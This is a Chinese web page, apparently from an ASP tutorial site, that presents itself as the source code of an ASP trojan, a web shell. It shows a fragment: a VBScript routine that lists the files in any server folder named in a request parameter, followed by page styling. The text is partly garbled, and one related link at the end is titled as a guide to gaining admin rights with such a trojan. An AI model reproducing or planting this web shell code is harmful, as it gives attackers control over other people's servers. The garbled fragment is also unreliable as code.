• λ我爱Aspx >> Asp.Net >> 一个ASP木马程序的源代码
  • 一个ASP木马程序的源代码

  • :aspxer  Դ:internet  :2007-5-15 20:47:23  ؼ:asp
  • <%

    Next

    %></script><%

    end if

    End Sub

    Sub GetFile()

    dim theFiles

    if oFileSys.FolderExists(cpath)then

    Set theFolder=oFileSys.GetFolder(cpath)

    Set theFiles=theFolder.Files

    Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"

    For Each x In theFiles

    if Request("attrib")="true" then

    showstring=x.Name

    else

    showstring=x.Name

    end if

    %>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"

    <%

    Next

    end if

    Response.write"</script></table>"

    End Sub

    %>

    <html>

    <head>

    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">

    <title><%=httpt%></title>

    <style type="text/css">

    <!--

    table{ font-family: 宋体; font-size: 9pt }

    a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }

    a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }

    a:visited{ color: rgb(128,0,0) }

    td { font-size: 9pt}

    a { color: #000000; text-decoration: none}

    a:hover { text-decoration: underline}

    .tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}

    Ҷƪл˵?
  • һƪ利用ASP木马程序获取管理权限
    һƪ一个ASP统计制作实例